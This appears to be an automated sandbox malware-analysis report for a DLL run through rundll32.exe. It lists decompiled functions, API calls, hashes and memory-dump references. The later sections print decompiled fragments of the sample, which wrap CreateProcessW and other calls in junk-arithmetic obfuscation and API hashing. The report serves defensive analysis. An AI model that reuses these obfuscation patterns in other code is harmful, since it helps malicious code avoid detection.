Opcode ID: b466ca1c16270a6aeefbc780a34b751a8cebd46bc3194cef4d6cef4ec874fdb5
Instruction ID: bc57fee72f2b3242614b7ca03514efe4293e82c952846c67e71c04b3b00f2a7c
Opcode Fuzzy Hash: b466ca1c16270a6aeefbc780a34b751a8cebd46bc3194cef4d6cef4ec874fdb5
Instruction Fuzzy Hash: C7B09B705407035EDD506EF5494CA5E3D5675C120130148806015ED141E9948085A979

Uniqueness

Uniqueness Score: -1.00%

Function 6EA8C2E0, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 9
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6EA8C2E0() {
				struct HINSTANCE__* _t1;

				_t1 = GetModuleHandleA("ntdll");
				if(_t1 == 0) {
					return _t1;
				} else {
					return GetProcAddress(_t1, "NtReleaseKeyedEvent");
				}
			}

0x6ea8c2e5
0x6ea8c2ed
0x6ea8c2fc
0x6ea8c2ef
0x6ea8c2fb
0x6ea8c2fb

APIs

GetModuleHandleA.KERNEL32(ntdll), ref: 6EA8C2E5
GetProcAddress.KERNEL32(00000000,NtReleaseKeyedEvent), ref: 6EA8C2F5

Strings

NtReleaseKeyedEvent, xrefs: 6EA8C2EF
ntdll, xrefs: 6EA8C2E0

Memory Dump Source

Source File: 00000002.00000002.598535305.000000006EA81000.00000020.00020000.sdmp, Offset: 6EA80000, based on PE: true

Associated: 00000002.00000002.598492009.000000006EA80000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.598909435.000000006EAAA000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.599255697.000000006EADD000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.599275726.000000006EADF000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.599287805.000000006EAE0000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressHandleModuleProc
String ID: NtReleaseKeyedEvent$ntdll
API String ID: 1646373207-31681898
Opcode ID: bb3510bcda6a4ae0e5db69ff75fe2e4ebbf6ffea9f002ee44e5f4dfe89757af3
Instruction ID: eba0bbeb6caaebec2256050df1304cf185e865f7594bc8cb0e8675f9860a29b7
Opcode Fuzzy Hash: bb3510bcda6a4ae0e5db69ff75fe2e4ebbf6ffea9f002ee44e5f4dfe89757af3
Instruction Fuzzy Hash: F9B092B0A00B036ADEA07AF58A8CA9B399AB9812113428540A022FD140FA2480859D2A

Uniqueness

Uniqueness Score: -1.00%

Function 6EA8C2C0, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 9
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6EA8C2C0() {
				struct HINSTANCE__* _t1;

				_t1 = GetModuleHandleA("ntdll");
				if(_t1 == 0) {
					return _t1;
				} else {
					return GetProcAddress(_t1, "NtWaitForKeyedEvent");
				}
			}

0x6ea8c2c5
0x6ea8c2cd
0x6ea8c2dc
0x6ea8c2cf
0x6ea8c2db
0x6ea8c2db

APIs

GetModuleHandleA.KERNEL32(ntdll), ref: 6EA8C2C5
GetProcAddress.KERNEL32(00000000,NtWaitForKeyedEvent), ref: 6EA8C2D5

Strings

NtWaitForKeyedEvent, xrefs: 6EA8C2CF
ntdll, xrefs: 6EA8C2C0

Memory Dump Source

Source File: 00000002.00000002.598535305.000000006EA81000.00000020.00020000.sdmp, Offset: 6EA80000, based on PE: true

Associated: 00000002.00000002.598492009.000000006EA80000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.598909435.000000006EAAA000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.599255697.000000006EADD000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.599275726.000000006EADF000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.599287805.000000006EAE0000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressHandleModuleProc
String ID: NtWaitForKeyedEvent$ntdll
API String ID: 1646373207-2815205136
Opcode ID: 948645f71f237e1b56ecffe30a587964ab7f0b1ac7cff089c0bd7c04a844ee3c
Instruction ID: 384a62f83ff31b998d41c8e2070128b91985ad9682b4829b8e533bf753eb04e5
Opcode Fuzzy Hash: 948645f71f237e1b56ecffe30a587964ab7f0b1ac7cff089c0bd7c04a844ee3c
Instruction Fuzzy Hash: 7AB09BB0940B025EDDD07AF5894C65A3966754125134144406115ED140E51480459D65

Uniqueness

Uniqueness Score: -1.00%

Function 6EA8C260, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 9
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6EA8C260() {
				struct HINSTANCE__* _t1;

				_t1 = GetModuleHandleA("kernel32");
				if(_t1 == 0) {
					return _t1;
				} else {
					return GetProcAddress(_t1, "GetSystemTimePreciseAsFileTime");
				}
			}

0x6ea8c265
0x6ea8c26d
0x6ea8c27c
0x6ea8c26f
0x6ea8c27b
0x6ea8c27b

APIs

GetModuleHandleA.KERNEL32(kernel32), ref: 6EA8C265
GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 6EA8C275

Strings

GetSystemTimePreciseAsFileTime, xrefs: 6EA8C26F
kernel32, xrefs: 6EA8C260

Memory Dump Source

Source File: 00000002.00000002.598535305.000000006EA81000.00000020.00020000.sdmp, Offset: 6EA80000, based on PE: true

Associated: 00000002.00000002.598492009.000000006EA80000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.598909435.000000006EAAA000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.599255697.000000006EADD000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.599275726.000000006EADF000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.599287805.000000006EAE0000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressHandleModuleProc
String ID: GetSystemTimePreciseAsFileTime$kernel32
API String ID: 1646373207-392834919
Opcode ID: ca61df8d7cb69a248927ea54f9c1c991b67fe9e3c842d8a88fb9f3310042f94b
Instruction ID: 910768171c1c05ad4e38140f967a895f84874832a44e195eafc55b1e6138d57f
Opcode Fuzzy Hash: ca61df8d7cb69a248927ea54f9c1c991b67fe9e3c842d8a88fb9f3310042f94b
Instruction Fuzzy Hash: 14B092B0640B026AEEA06EF58A8CA5E39ABB9822417028980A111ED140EA24C0C5AD2A

Uniqueness

Uniqueness Score: -1.00%

Function 6EA8C300, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 9
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6EA8C300() {
				struct HINSTANCE__* _t1;

				_t1 = GetModuleHandleA("ntdll");
				if(_t1 == 0) {
					return _t1;
				} else {
					return GetProcAddress(_t1, "NtCreateKeyedEvent");
				}
			}

0x6ea8c305
0x6ea8c30d
0x6ea8c31c
0x6ea8c30f
0x6ea8c31b
0x6ea8c31b

APIs

GetModuleHandleA.KERNEL32(ntdll), ref: 6EA8C305
GetProcAddress.KERNEL32(00000000,NtCreateKeyedEvent), ref: 6EA8C315

Strings

NtCreateKeyedEvent, xrefs: 6EA8C30F
ntdll, xrefs: 6EA8C300

Memory Dump Source

Source File: 00000002.00000002.598535305.000000006EA81000.00000020.00020000.sdmp, Offset: 6EA80000, based on PE: true

Associated: 00000002.00000002.598492009.000000006EA80000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.598909435.000000006EAAA000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.599255697.000000006EADD000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.599275726.000000006EADF000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.599287805.000000006EAE0000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressHandleModuleProc
String ID: NtCreateKeyedEvent$ntdll
API String ID: 1646373207-1373576770
Opcode ID: 664fda096b8c0330d8e3fdb1c2649a746885dc6224536d09a27fa0122597da7b
Instruction ID: b4e23696761bd570cf6c5647d6e5bccb92cff821ffe3bb5882a05287f3b00f9f
Opcode Fuzzy Hash: 664fda096b8c0330d8e3fdb1c2649a746885dc6224536d09a27fa0122597da7b
Instruction Fuzzy Hash: 88B09B70900B025FDD906AF5494C55B3956F55135134184407061ED101D51484469D29

Uniqueness

Uniqueness Score: -1.00%

Function 6EAA6749, Relevance: 6.3, APIs: 4, Instructions: 338fileCOMMON

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32(877AAF3F,?,00000000,?), ref: 6EAA67AC

Part of subcall function 6EAA4073: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,6EAA61E2,?,00000000,-00000008), ref: 6EAA411F

WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 6EAA6A07
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 6EAA6A4F
GetLastError.KERNEL32 ref: 6EAA6AF2

Memory Dump Source

Source File: 00000002.00000002.598535305.000000006EA81000.00000020.00020000.sdmp, Offset: 6EA80000, based on PE: true

Associated: 00000002.00000002.598492009.000000006EA80000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.598909435.000000006EAAA000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.599255697.000000006EADD000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.599275726.000000006EADF000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.599287805.000000006EAE0000.00000002.00020000.sdmp Download File

Similarity

API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
String ID:
API String ID: 2112829910-0
Opcode ID: ba1c1b61589bd10ebb054089067c74aa241fa773fdbbcb4d1b696b0160eaaab1
Instruction ID: 447df1aaee1f28ce98502679b57abca7eaa9079692686f0636b3e176fc0a9405
Opcode Fuzzy Hash: ba1c1b61589bd10ebb054089067c74aa241fa773fdbbcb4d1b696b0160eaaab1
Instruction Fuzzy Hash: F1D136B5D106599FCB01CFECC8809EDBBB4EF49314F18852AE956AB341D730A882CF55

Uniqueness

Uniqueness Score: -1.00%

Function 6EA9F49F, Relevance: 6.2, APIs: 4, Instructions: 168COMMON

Download Yara Rule

APIs

___AdjustPointer.LIBCMT ref: 6EA9F566
___AdjustPointer.LIBCMT ref: 6EA9F589
___AdjustPointer.LIBCMT ref: 6EA9F625

Memory Dump Source

Source File: 00000002.00000002.598535305.000000006EA81000.00000020.00020000.sdmp, Offset: 6EA80000, based on PE: true

Associated: 00000002.00000002.598492009.000000006EA80000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.598909435.000000006EAAA000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.599255697.000000006EADD000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.599275726.000000006EADF000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.599287805.000000006EAE0000.00000002.00020000.sdmp Download File

Similarity

API ID: AdjustPointer
String ID:
API String ID: 1740715915-0
Opcode ID: 350d142b1aff1e63bf32f044fb0b4b4a36d3d4de43bf2ef2281297c2da0b9abf
Instruction ID: 43a499846d370d0eacef2aa949a844f528770bffbacb5cafb2165ef01b5c2f85
Opcode Fuzzy Hash: 350d142b1aff1e63bf32f044fb0b4b4a36d3d4de43bf2ef2281297c2da0b9abf
Instruction Fuzzy Hash: B251C17A625602AFDB148F94D950BBA73E4FF40314F34492DF92587290DB31E8C0EB98

Uniqueness

Uniqueness Score: -1.00%

Function 6EAA2D87, Relevance: 6.1, APIs: 4, Instructions: 82COMMON

Download Yara Rule

APIs

Part of subcall function 6EAA4073: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,6EAA61E2,?,00000000,-00000008), ref: 6EAA411F

GetLastError.KERNEL32 ref: 6EAA2DEB
__dosmaperr.LIBCMT ref: 6EAA2DF2
GetLastError.KERNEL32(?,?,?,?), ref: 6EAA2E2C
__dosmaperr.LIBCMT ref: 6EAA2E33

Memory Dump Source

Source File: 00000002.00000002.598535305.000000006EA81000.00000020.00020000.sdmp, Offset: 6EA80000, based on PE: true

Associated: 00000002.00000002.598492009.000000006EA80000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.598909435.000000006EAAA000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.599255697.000000006EADD000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.599275726.000000006EADF000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.599287805.000000006EAE0000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast__dosmaperr$ByteCharMultiWide
String ID:
API String ID: 1913693674-0
Opcode ID: 6d48b87002d6e5aa74764fd5e32787e82a86baec4cd7ad2c5374eb295f18de21
Instruction ID: e41d4aa7dd6bf71a53bec63f4765fb16c996291a4bc4ef734fbb426fc9758db6
Opcode Fuzzy Hash: 6d48b87002d6e5aa74764fd5e32787e82a86baec4cd7ad2c5374eb295f18de21
Instruction Fuzzy Hash: F921A171604705BF9B519FEFC98089BBBFDAF413687048929EA1497110D731ECE587B4

Uniqueness

Uniqueness Score: -1.00%

Function 6EAA7EA6, Relevance: 6.0, APIs: 4, Instructions: 29COMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,?,6EAA7857,?,00000001,?,?,?,6EAA6B46,?,?,00000000), ref: 6EAA7EBD
GetLastError.KERNEL32(?,6EAA7857,?,00000001,?,?,?,6EAA6B46,?,?,00000000,?,?,?,6EAA70CD,?), ref: 6EAA7EC9

Part of subcall function 6EAA7E8F: CloseHandle.KERNEL32(FFFFFFFE,6EAA7ED9,?,6EAA7857,?,00000001,?,?,?,6EAA6B46,?,?,00000000,?,?), ref: 6EAA7E9F

___initconout.LIBCMT ref: 6EAA7ED9

Part of subcall function 6EAA7E51: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,6EAA7E80,6EAA7844,?,?,6EAA6B46,?,?,00000000,?), ref: 6EAA7E64

WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,6EAA7857,?,00000001,?,?,?,6EAA6B46,?,?,00000000,?), ref: 6EAA7EEE

Memory Dump Source

Source File: 00000002.00000002.598535305.000000006EA81000.00000020.00020000.sdmp, Offset: 6EA80000, based on PE: true

Associated: 00000002.00000002.598492009.000000006EA80000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.598909435.000000006EAAA000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.599255697.000000006EADD000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.599275726.000000006EADF000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.599287805.000000006EAE0000.00000002.00020000.sdmp Download File

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: f1a35e529e72ce2a034dd720c433d3519c56de045483bc37b50823cb234c3310
Instruction ID: 68181663f14d0daf6f336906252e44b261cb23c7e891336fc477e7d65c6f78a4
Opcode Fuzzy Hash: f1a35e529e72ce2a034dd720c433d3519c56de045483bc37b50823cb234c3310
Instruction Fuzzy Hash: 99F01C36400719BBCF221FD9CC04A9F7F76EB0A3A0B06C414FA18AA564C7328CA1DB94

Uniqueness

Uniqueness Score: -1.00%

Function 6EA9FAA0, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMON

Download Yara Rule

APIs

EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 6EA9FAC5

Strings

MOC, xrefs: 6EA9FAD7
RCC, xrefs: 6EA9FADF

Memory Dump Source

Source File: 00000002.00000002.598535305.000000006EA81000.00000020.00020000.sdmp, Offset: 6EA80000, based on PE: true

Associated: 00000002.00000002.598492009.000000006EA80000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.598909435.000000006EAAA000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.599255697.000000006EADD000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.599275726.000000006EADF000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.599287805.000000006EAE0000.00000002.00020000.sdmp Download File

Similarity

API ID: EncodePointer
String ID: MOC$RCC
API String ID: 2118026453-2084237596
Opcode ID: 32a13d7f8404830e88622a178ed4aab23bd0ea575cec5364be2519b6a2359e2b
Instruction ID: bf43b1305ebede841def81cf71776f2bdc6ff783585fc6583a24775a8267e80b
Opcode Fuzzy Hash: 32a13d7f8404830e88622a178ed4aab23bd0ea575cec5364be2519b6a2359e2b
Instruction Fuzzy Hash: DC41677691020AAFCF02CFD8C990AEE7BF9BF08304F288499F915A7254D335D991EB54

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: rundll32.exe PID: 6176 Parent PID: 6172 rundll32.exeCOMMON

Executed Functions

Function 00529100, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 74
processCOMMON

Download Yara Rule

C-Code - Quality: 41%

			E00529100(void* __ecx, WCHAR* __edx, WCHAR* _a8, struct _PROCESS_INFORMATION* _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a36, struct _STARTUPINFOW* _a40, intOrPtr _a44, int _a48, intOrPtr _a52, intOrPtr _a56, intOrPtr _a60, intOrPtr _a64) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				struct _SECURITY_ATTRIBUTES* _v24;
				intOrPtr _v28;
				void* _t52;
				int _t60;
				WCHAR* _t64;

				_t64 = __edx;
				_push(0);
				_push(0);
				_push(_a64);
				_push(_a60);
				_push(_a56);
				_push(_a52);
				_push(_a48);
				_push(_a44);
				_push(_a40);
				_push(_a36);
				_push(0);
				_push(_a28);
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(0);
				_push(_a8);
				_push(0);
				_push(__edx);
				_push(__ecx);
				E00518002(_t52);
				_v28 = 0x2905a5;
				_v24 = 0;
				_v12 = 0xa2d8b8;
				_v12 = _v12 + 0xfffff871;
				_v12 = _v12 ^ 0x5b121ec8;
				_v12 = _v12 ^ 0x21b4fd5f;
				_v12 = _v12 ^ 0x7a067dbd;
				_v8 = 0x36027e;
				_v8 = _v8 ^ 0x6c06375b;
				_v8 = _v8 * 0x51;
				_v8 = _v8 + 0xffff0cdd;
				_v8 = _v8 ^ 0x3b3a0501;
				_v20 = 0x3133e6;
				_v20 = _v20 ^ 0xa81fc925;
				_v20 = _v20 ^ 0xa82b7027;
				_v16 = 0x47f0fa;
				_v16 = _v16 | 0xed8e49a9;
				_v16 = _v16 ^ 0xedcdbeb4;
				E0052E399(__ecx, __edx, __ecx, 0xa2449830, 0x53, 0xa9376bff);
				_t60 = CreateProcessW(_t64, _a8, 0, 0, _a48, 0, 0, 0, _a40, _a16); // executed
				return _t60;
			}

0x0052910a
0x0052910c
0x0052910d
0x0052910e
0x00529111
0x00529114
0x00529117
0x0052911a
0x0052911d
0x00529120
0x00529123
0x00529126
0x00529127
0x0052912a
0x0052912d
0x00529130
0x00529133
0x00529134
0x00529137
0x00529138
0x00529139
0x0052913a
0x0052913f
0x00529149
0x0052914c
0x00529153
0x0052915a
0x00529161
0x00529168
0x0052916f
0x00529176
0x0052918e
0x00529191
0x00529198
0x0052919f
0x005291a6
0x005291ad
0x005291b4
0x005291bb
0x005291c2
0x005291d5
0x005291ef
0x005291f6

APIs

CreateProcessW.KERNELBASE(?,EDCDBEB4,00000000,00000000,?,00000000,00000000,00000000,?,?), ref: 005291EF

Strings

31, xrefs: 0052919F

Memory Dump Source

Source File: 00000003.00000002.595650059.0000000000510000.00000040.00000010.sdmp, Offset: 00510000, based on PE: true

Yara matches

Similarity

API ID: CreateProcess
String ID: 31
API String ID: 963392458-1099231638
Opcode ID: 802e8488796198306ded7f534c69eccd1f3fee1a7ddcada247a2de1a0aa744a2
Instruction ID: 23d26f466857ce5ae4a524ef8a6ffc6f75b8511c5abef36009d32aa3cde4edbb
Opcode Fuzzy Hash: 802e8488796198306ded7f534c69eccd1f3fee1a7ddcada247a2de1a0aa744a2
Instruction Fuzzy Hash: 3F31F272801259BBCF559FA6CD49CDFBFB5FF89710F108158FA1462120C3728A60EBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00520207, Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 70
stringCOMMON

Download Yara Rule

C-Code - Quality: 70%

			E00520207(void* __ecx, WCHAR* __edx, intOrPtr _a4, WCHAR* _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _v32;
				intOrPtr _v36;
				void* _t54;
				int _t68;
				signed int _t70;
				signed int _t71;
				signed int _t72;
				WCHAR* _t81;

				_push(_a16);
				_t81 = __edx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				E00518002(_t54);
				_v36 = 0xa7e4f2;
				asm("stosd");
				_t70 = 0x7b;
				asm("stosd");
				asm("stosd");
				_v12 = 0x53fdc4;
				_t71 = 0x5a;
				_v12 = _v12 / _t70;
				_v12 = _v12 << 7;
				_v12 = _v12 ^ 0xe1fe8b09;
				_v12 = _v12 ^ 0xe1ac8480;
				_v20 = 0x744728;
				_v20 = _v20 << 0xf;
				_v20 = _v20 ^ 0x239bcee7;
				_v16 = 0xd5199;
				_v16 = _v16 + 0xffff5a50;
				_v16 = _v16 / _t71;
				_v16 = _v16 ^ 0x000f59f5;
				_v8 = 0xa57c1a;
				_v8 = _v8 | 0x119c25df;
				_v8 = _v8 + 0xffffdcc6;
				_t72 = 0x4f;
				_v8 = _v8 / _t72;
				_v8 = _v8 ^ 0x003b1570;
				E0052E399(_t72, _v8 % _t72, _t72, 0xa2449830, 0x167, 0xa9a77114);
				_t68 = lstrcmpiW(_a8, _t81); // executed
				return _t68;
			}

0x0052020f
0x00520212
0x00520214
0x00520217
0x0052021a
0x0052021d
0x0052021f
0x00520224
0x00520232
0x00520235
0x00520238
0x00520239
0x0052023a
0x00520246
0x00520247
0x0052024c
0x00520250
0x00520257
0x0052025e
0x00520265
0x00520269
0x00520270
0x00520277
0x00520285
0x0052028a
0x00520291
0x00520298
0x0052029f
0x005202a9
0x005202af
0x005202b2
0x005202d5
0x005202e1
0x005202e8

APIs

lstrcmpiW.KERNELBASE(000F59F5,00000000,?,?,?,?,?,?,?,9B842ACC,01B64447,00000000), ref: 005202E1

Strings

(Gt, xrefs: 0052025E

Memory Dump Source

Source File: 00000003.00000002.595650059.0000000000510000.00000040.00000010.sdmp, Offset: 00510000, based on PE: true

Yara matches

Similarity

API ID: lstrcmpi
String ID: (Gt
API String ID: 1586166983-558867117
Opcode ID: bb735ff999d9414c3a9b564c67b10e962bbdffe1a82627d97bbaa383f4a39bdb
Instruction ID: 9e28c50dcee886825a64413ac4fa4354786a4701b6e905773bccd64ca3f85b3f
Opcode Fuzzy Hash: bb735ff999d9414c3a9b564c67b10e962bbdffe1a82627d97bbaa383f4a39bdb
Instruction Fuzzy Hash: CE2166B5E00208FBEF14DFA4CC0A9DEBBB2FB84314F108599E515AA250E7B65A50DF90

Uniqueness

Uniqueness Score: -1.00%

Function 0051F3F7, Relevance: 1.5, APIs: 1, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E0051F3F7() {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				signed int _t47;

				_v28 = _v28 & 0x00000000;
				_v24 = _v24 & 0x00000000;
				_v36 = 0xb0bfd;
				_v32 = 0x231de0;
				_v20 = 0x822c7a;
				_t47 = 0x31;
				_push(_t47);
				_v20 = _v20 * 0x25;
				_v20 = _v20 ^ 0x12d3a120;
				_v12 = 0x122796;
				_v12 = _v12 | 0x5fffe7f7;
				_v12 = _v12 ^ 0x5ff36a5b;
				_v8 = 0xc53dc4;
				_v8 = _v8 + 0xffff669e;
				_v8 = _v8 + 0xba03;
				_v8 = _v8 + 0x1f9e;
				_v8 = _v8 ^ 0x00c2122b;
				_v16 = 0x5857ad;
				_v16 = _v16 / _t47;
				_v16 = _v16 ^ 0x000b8ebe;
				E0052E399(_t47, _v16 % _t47, _t47, 0xa2449830, 0x41, 0x9da8748a);
				ExitProcess(0);
			}

0x0051f3fd
0x0051f403
0x0051f407
0x0051f40e
0x0051f415
0x0051f422
0x0051f423
0x0051f429
0x0051f42c
0x0051f433
0x0051f43a
0x0051f441
0x0051f448
0x0051f44f
0x0051f456
0x0051f45d
0x0051f464
0x0051f46b
0x0051f479
0x0051f47c
0x0051f495
0x0051f49f

APIs

ExitProcess.KERNEL32(00000000), ref: 0051F49F

Memory Dump Source

Source File: 00000003.00000002.595650059.0000000000510000.00000040.00000010.sdmp, Offset: 00510000, based on PE: true

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 03812332bf7814123334a19349d3f4d4ec07a23d3eba325336f5a23eb22f412d
Instruction ID: 590e3c154f79ab47a2a642f1ee8cbaed5ed8ecee0b0e8071ac3bbbfe02aafd3f
Opcode Fuzzy Hash: 03812332bf7814123334a19349d3f4d4ec07a23d3eba325336f5a23eb22f412d
Instruction Fuzzy Hash: 961106B1E1021DEBDF04DFE4D98A6EEBBB4FB14315F108188E521AA280E7B45B548F80

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: rundll32.exe PID: 4248 Parent PID: 4668 rundll32.exeCOMMON

Executed Functions

Function 003D9100, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 74
processCOMMON

Download Yara Rule

C-Code - Quality: 41%

			E003D9100(void* __ecx, WCHAR* __edx, WCHAR* _a8, struct _PROCESS_INFORMATION* _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a36, struct _STARTUPINFOW* _a40, intOrPtr _a44, int _a48, intOrPtr _a52, intOrPtr _a56, intOrPtr _a60, intOrPtr _a64) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				struct _SECURITY_ATTRIBUTES* _v24;
				intOrPtr _v28;
				void* _t52;
				int _t60;
				WCHAR* _t64;

				_t64 = __edx;
				_push(0);
				_push(0);
				_push(_a64);
				_push(_a60);
				_push(_a56);
				_push(_a52);
				_push(_a48);
				_push(_a44);
				_push(_a40);
				_push(_a36);
				_push(0);
				_push(_a28);
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(0);
				_push(_a8);
				_push(0);
				_push(__edx);
				_push(__ecx);
				E003C8002(_t52);
				_v28 = 0x2905a5;
				_v24 = 0;
				_v12 = 0xa2d8b8;
				_v12 = _v12 + 0xfffff871;
				_v12 = _v12 ^ 0x5b121ec8;
				_v12 = _v12 ^ 0x21b4fd5f;
				_v12 = _v12 ^ 0x7a067dbd;
				_v8 = 0x36027e;
				_v8 = _v8 ^ 0x6c06375b;
				_v8 = _v8 * 0x51;
				_v8 = _v8 + 0xffff0cdd;
				_v8 = _v8 ^ 0x3b3a0501;
				_v20 = 0x3133e6;
				_v20 = _v20 ^ 0xa81fc925;
				_v20 = _v20 ^ 0xa82b7027;
				_v16 = 0x47f0fa;
				_v16 = _v16 | 0xed8e49a9;
				_v16 = _v16 ^ 0xedcdbeb4;
				E003DE399(__ecx, __edx, __ecx, 0xa2449830, 0x53, 0xa9376bff);
				_t60 = CreateProcessW(_t64, _a8, 0, 0, _a48, 0, 0, 0, _a40, _a16); // executed
				return _t60;
			}

0x003d910a
0x003d910c
0x003d910d
0x003d910e
0x003d9111
0x003d9114
0x003d9117
0x003d911a
0x003d911d
0x003d9120
0x003d9123
0x003d9126
0x003d9127
0x003d912a
0x003d912d
0x003d9130
0x003d9133
0x003d9134
0x003d9137
0x003d9138
0x003d9139
0x003d913a
0x003d913f
0x003d9149
0x003d914c
0x003d9153
0x003d915a
0x003d9161
0x003d9168
0x003d916f
0x003d9176
0x003d918e
0x003d9191
0x003d9198
0x003d919f
0x003d91a6
0x003d91ad
0x003d91b4
0x003d91bb
0x003d91c2
0x003d91d5
0x003d91ef
0x003d91f6

APIs

CreateProcessW.KERNELBASE(?,EDCDBEB4,00000000,00000000,?,00000000,00000000,00000000,?,?), ref: 003D91EF

Strings

31, xrefs: 003D919F

Memory Dump Source

Source File: 00000005.00000002.598782764.00000000003C0000.00000040.00000010.sdmp, Offset: 003C0000, based on PE: true

Yara matches

Similarity

API ID: CreateProcess
String ID: 31
API String ID: 963392458-1099231638
Opcode ID: 802e8488796198306ded7f534c69eccd1f3fee1a7ddcada247a2de1a0aa744a2
Instruction ID: e42a3194fa00cf21298dbaafe6a0dd0c2b96d5e728d353be3ef1d4028e09869b
Opcode Fuzzy Hash: 802e8488796198306ded7f534c69eccd1f3fee1a7ddcada247a2de1a0aa744a2
Instruction Fuzzy Hash: 6E31F272801258BBCF559FA6CD05CDFBFB5FF89710F108158FA14A2120C3728A60EBA1

Uniqueness

Uniqueness Score: -1.00%

Function 003D0207, Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 70
stringCOMMON

Download Yara Rule

C-Code - Quality: 70%

			E003D0207(void* __ecx, WCHAR* __edx, intOrPtr _a4, WCHAR* _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _v32;
				intOrPtr _v36;
				void* _t54;
				int _t68;
				signed int _t70;
				signed int _t71;
				signed int _t72;
				WCHAR* _t81;

				_push(_a16);
				_t81 = __edx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				E003C8002(_t54);
				_v36 = 0xa7e4f2;
				asm("stosd");
				_t70 = 0x7b;
				asm("stosd");
				asm("stosd");
				_v12 = 0x53fdc4;
				_t71 = 0x5a;
				_v12 = _v12 / _t70;
				_v12 = _v12 << 7;
				_v12 = _v12 ^ 0xe1fe8b09;
				_v12 = _v12 ^ 0xe1ac8480;
				_v20 = 0x744728;
				_v20 = _v20 << 0xf;
				_v20 = _v20 ^ 0x239bcee7;
				_v16 = 0xd5199;
